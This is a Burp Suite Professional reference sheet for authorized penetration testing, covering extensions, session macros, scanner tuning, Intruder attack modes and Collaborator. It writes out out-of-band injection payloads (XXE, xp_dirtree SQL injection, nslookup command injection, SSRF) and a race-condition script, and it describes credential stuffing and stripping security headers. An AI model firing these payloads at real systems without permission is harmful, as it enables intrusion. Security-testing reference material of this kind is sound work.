BURPSUITE-ADVANCED
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Advanced techniques, extensions, and workflows for Burp Suite Professional.
ESSENTIAL EXTENSIONS#
Autorize
- Automated authorization testing
- Configure low-privilege session cookie in headers
- Browse as high-privilege user; Autorize replays requests with low-priv cookie
- Color codes: red (authz bypass), green (enforced), yellow (uncertain)
Logger++
- Advanced logging with filters and grep across all traffic
- Export logs to CSV/JSON for offline analysis
- Useful filters: response contains "password", status code 500
- Regex filtering on request/response pairs
Param Miner
- Discovers hidden parameters and headers
- Essential for cache poisoning and hidden functionality
- Usage: right-click request -> Extensions -> Param Miner -> Guess headers/params
- Finds unkeyed headers for web cache poisoning
Hackvertor
- Tag-based encoder/decoder within Repeater/Intruder
- Nest encoding: <@base64><@url>payload<@/url><@/base64>
- Auto-update hashes, lengths, timestamps in requests
- Custom tags for complex encoding chains
Active Scan++
- Enhances Burp's active scanner with additional checks
- Detects host header injection, cache poisoning, input transformation issues
JSON Web Tokens (JWT Editor)
- Decode, modify, and sign JWTs
- Test for alg:none, key confusion, weak secrets
- Generate signing keys for exploitation
Turbo Intruder
- Python-based high-speed Intruder alternative
- Race condition testing with gate mechanism
- Handles millions of requests with minimal memory
- Example race condition script:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30,
requestsPerConnection=100, pipeline=False)
for i in range(30):
engine.queue(target.req, gate='race1')
engine.openGate('race1')
Upload Scanner
- Tests file upload functionality for bypasses
- Generates polyglot files, tests extension filtering
- Content-type manipulation and magic byte injection
InQL (GraphQL)
- GraphQL introspection and attack surface mapping
- Generates queries from schema
- Batch query testing
MACROS AND SESSION HANDLING#
Creating a Macro:
1. Project Options -> Sessions -> Macros -> Add
2. Select recorded requests that represent the session flow
3. Define parameter extraction from responses (CSRF tokens, session IDs)
4. Configure derived parameters between macro steps
Session Handling Rules:
1. Project Options -> Sessions -> Session Handling Rules -> Add
2. Rule Actions:
- Run a macro (e.g., re-authenticate before each scan request)
- Check session is valid (define indicators)
- Update current request with parameters from macro response
3. Scope: define which tools and URLs the rule applies to
4. Example flow:
Macro: GET /csrf-token -> POST /login -> Extract session cookie
Rule: Run macro if session invalid, update request cookies
Multi-Step Authentication Macro:
Step 1: GET /login (extract CSRF token)
Step 2: POST /login with credentials + CSRF token (extract session cookie)
Step 3: GET /dashboard (validate session is active)
Configure: "If last response does not contain 'Welcome', re-run macro"
Token Extraction in Macros:
- Define custom parameter locations in response
- Use regex or start/end delimiters
- Derive parameters from one request to the next
- Tolerate URL changes for dynamic endpoints
SCANNER TUNING#
Scan Configuration:
- Audit optimization:
Speed: Faster -> fewer checks, Thorough -> comprehensive
Issues reported: Minimize false positives vs. find everything
- Crawl settings:
Max crawl depth, max unique locations, login credentials
Crawl strategy: Fastest, Faster, Normal, More complete, Most complete
Custom Scan Profiles:
- Create profiles for specific vulnerability classes
- SQLi-only scan: disable all checks except SQL injection variants
- XSS-only scan: focus on reflected/stored/DOM-based XSS
- Save and reuse profiles across projects
Scan Scope:
- Include/exclude URL patterns
- Exclude logout URLs to maintain session
- Exclude static resources for speed
- Example exclusions:
*.css, *.js, *.png, *.jpg, *.gif, /logout, /signout
Handling Scan Issues:
- False positive: right-click -> "Mark as false positive"
- Confidence levels: Certain, Firm, Tentative
- Severity: High, Medium, Low, Information
INTRUDER ATTACK TYPES#
Sniper:
- Single payload set, one position at a time
- Use for: fuzzing individual parameters, testing one field
- Positions: $$param1$$, $$param2$$ tested sequentially
Battering Ram:
- Single payload set, all positions simultaneously
- Use for: testing same value in multiple locations (e.g., CSRF token reuse)
Pitchfork:
- Multiple payload sets, one per position, in parallel
- Use for: credential stuffing (username list + password list, paired 1:1)
- Position 1 gets payload set 1, position 2 gets payload set 2
Cluster Bomb:
- Multiple payload sets, every combination tested
- Use for: brute force all username/password combinations
- Warning: combinatorial explosion with large lists
- N1 * N2 total requests
Payload Processing:
- Add prefix/suffix
- Encode (URL, Base64, hash)
- Match/replace within payloads
- Invoke Burp extension for custom processing
- Skip if matches regex
Resource Pool:
- Control concurrent requests (avoid DoS)
- Add delays between requests
- Throttle to avoid rate limiting / WAF triggers
COLLABORATOR USAGE#
Basics:
- Burp Collaborator: out-of-band interaction detection
- Generates unique subdomains: xyz123.burpcollaborator.net
- Detects DNS, HTTP, and SMTP interactions
Manual Testing:
- Burp menu -> Burp Collaborator Client
- Generate payloads -> Copy to clipboard
- Insert into test inputs (headers, parameters, file names)
- Poll for interactions
Common Use Cases:
- Blind SSRF: http://xyz123.burpcollaborator.net
- Blind XXE:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://xyz123.burpcollaborator.net">
]>
- Blind SQL injection (out-of-band):
'; EXEC master..xp_dirtree '//xyz123.burpcollaborator.net/a'--
- Blind OS command injection:
; nslookup xyz123.burpcollaborator.net
- Email header injection for SMTP interactions
Private Collaborator Server:
- Deploy your own for sensitive engagements
- java -jar burp.jar --collaborator-server --collaborator-config=config.json
MATCH AND REPLACE RULES#
Location: Proxy -> Options -> Match and Replace
Common Rules:
# Remove security headers (testing)
Match: X-Frame-Options: .*
Replace: (empty)
# Add custom header to all requests
Match: (empty, type: Request header)
Replace: X-Custom-Header: test_value
# Force HTTP to test for HTTPS enforcement
Match: https://
Replace: http://
# Modify User-Agent
Match: User-Agent: .*
Replace: User-Agent: Mozilla/5.0 (custom scanner)
# Remove CSP headers for XSS testing
Match: Content-Security-Policy: .*
Replace: (empty)
# Auto-update CSRF tokens (basic)
Match: csrf_token=OLD_VALUE
Replace: csrf_token=NEW_VALUE
Scope:
- Apply to requests, responses, or both
- Use regex for flexible matching
- Can be enabled/disabled individually
ADVANCED TIPS AND WORKFLOWS#
Bambdas (Burp 2024+):
- Java lambda expressions for custom filtering in HTTP history
- Filter Proxy history with code:
return requestResponse.hasResponse() &&
requestResponse.response().statusCode() == 403;
- More powerful than built-in filters
Scope Management:
- Use advanced scope with URL-matching rules
- Exclude common CDNs and third-party scripts
- Include only target domains + subdomains
Project Files:
- Save entire project state for later analysis
- Use project options files to share configurations
- Import/export scan configs between team members
Engagement Workflow:
1. Spider/crawl the application
2. Review sitemap, identify attack surface
3. Configure session handling if needed
4. Run passive scan on all captured traffic
5. Active scan specific endpoints
6. Manual testing with Repeater on interesting endpoints
7. Use Intruder for fuzzing and brute force
8. Check Collaborator for out-of-band interactions
9. Generate report
Keyboard Shortcuts:
Ctrl+R Send to Repeater
Ctrl+I Send to Intruder
Ctrl+S Send to Scanner
Ctrl+Shift+R Toggle Repeater
Ctrl+Shift+I Toggle Intruder
Ctrl+Space Send request (in Repeater)
Tips:
- Use response rendering to visualize reflected content
- Compare responses side-by-side in Comparer
- Use content discovery (Engagement tools) for hidden endpoints
- Export findings in multiple formats for reports
- Burp's embedded browser avoids TLS certificate issues
- Use "Copy as curl command" for quick testing outside Burp